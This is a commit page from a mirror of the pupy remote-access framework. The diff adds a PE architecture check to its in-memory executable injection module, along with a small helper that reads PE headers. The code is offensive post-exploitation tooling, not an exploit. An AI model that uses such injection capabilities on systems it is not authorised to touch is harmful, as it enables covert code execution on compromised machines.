mirror of https://github.com/n1nj4sec/pupy.git
adding arch checking to memory_exec issue #40
This commit is contained in:
parent
3e7c7cc409
commit
7dd24fcc6f
|
@ -30,7 +30,7 @@ client/sources/resources_msvcr90_dll.c
|
||||||
__pycache__/
|
__pycache__/
|
||||||
client/**/*.py[cod]
|
client/**/*.py[cod]
|
||||||
pupy/*.py[cod]
|
pupy/*.py[cod]
|
||||||
pupy/pupylib/*.py[cod]
|
pupy/pupylib/**/*.py[cod]
|
||||||
pupy/modules/*.py[cod]
|
pupy/modules/*.py[cod]
|
||||||
|
|
||||||
# do not ignore package & templates files
|
# do not ignore package & templates files
|
||||||
|
|
|
@ -15,6 +15,8 @@
|
||||||
# --------------------------------------------------------------
|
# --------------------------------------------------------------
|
||||||
from pupylib.PupyModule import *
|
from pupylib.PupyModule import *
|
||||||
from pupylib.PupyCompleter import *
|
from pupylib.PupyCompleter import *
|
||||||
|
from pupylib.utils.pe import get_pe_arch
|
||||||
|
from pupylib.PupyErrors import PupyModuleError
|
||||||
|
|
||||||
__class_name__="MemoryExec"
|
__class_name__="MemoryExec"
|
||||||
|
|
||||||
|
@ -30,7 +32,7 @@ class MemoryExec(PupyModule):
|
||||||
self.arg_parser.add_argument('-p', '--process', default='cmd.exe', help='process to start suspended')
|
self.arg_parser.add_argument('-p', '--process', default='cmd.exe', help='process to start suspended')
|
||||||
self.arg_parser.add_argument('--fork', action='store_true', help='fork and do not wait for the child program. stdout will not be retrieved', completer=path_completer)
|
self.arg_parser.add_argument('--fork', action='store_true', help='fork and do not wait for the child program. stdout will not be retrieved', completer=path_completer)
|
||||||
self.arg_parser.add_argument('--interactive', action='store_true', help='interactive with the new process stdin/stdout')
|
self.arg_parser.add_argument('--interactive', action='store_true', help='interactive with the new process stdin/stdout')
|
||||||
self.arg_parser.add_argument('path', help='path to the exe')
|
self.arg_parser.add_argument('path', help='path to the exe', completer=path_completer)
|
||||||
self.arg_parser.add_argument('args', nargs='*', help='optional arguments to pass to the exe')
|
self.arg_parser.add_argument('args', nargs='*', help='optional arguments to pass to the exe')
|
||||||
|
|
||||||
@windows_only
|
@windows_only
|
||||||
|
@ -49,6 +51,15 @@ class MemoryExec(PupyModule):
|
||||||
#TODO
|
#TODO
|
||||||
self.error("interactive memory execution has not been implemented yet")
|
self.error("interactive memory execution has not been implemented yet")
|
||||||
return
|
return
|
||||||
|
|
||||||
|
#check we are injecting from the good process arch:
|
||||||
|
pe_arch=get_pe_arch(args.path)
|
||||||
|
proc_arch=self.client.desc["proc_arch"]
|
||||||
|
if pe_arch!=proc_arch:
|
||||||
|
self.error("%s is a %s PE and your pupy payload is a %s process. Please inject a %s PE or first migrate into a %s process"%(args.path, pe_arch, proc_arch, proc_arch, pe_arch))
|
||||||
|
return
|
||||||
|
|
||||||
|
|
||||||
wait=True
|
wait=True
|
||||||
redirect_stdio=True
|
redirect_stdio=True
|
||||||
if args.fork:
|
if args.fork:
|
||||||
|
|
|
@ -0,0 +1,20 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
# -*- coding: UTF8 -*-
|
||||||
|
|
||||||
|
import pefile
|
||||||
|
|
||||||
|
def get_pe_arch(*args, **kwargs):
|
||||||
|
pe=None
|
||||||
|
if args:
|
||||||
|
pe = pefile.PE(args[0], fast_load=True)
|
||||||
|
elif "data" in kwargs:
|
||||||
|
pe = pefile.PE(data=kwargs["data"], fast_load=True)
|
||||||
|
else:
|
||||||
|
raise NameError("at least a path or data must be supplied to get_arch")
|
||||||
|
if pe.OPTIONAL_HEADER.Magic==0x010b:
|
||||||
|
return "32bit"
|
||||||
|
elif pe.OPTIONAL_HEADER.Magic==0x020b:
|
||||||
|
return "64bit"
|
||||||
|
else:
|
||||||
|
return "UNKNOWN"
|
||||||
|
|
Loading…
Reference in New Issue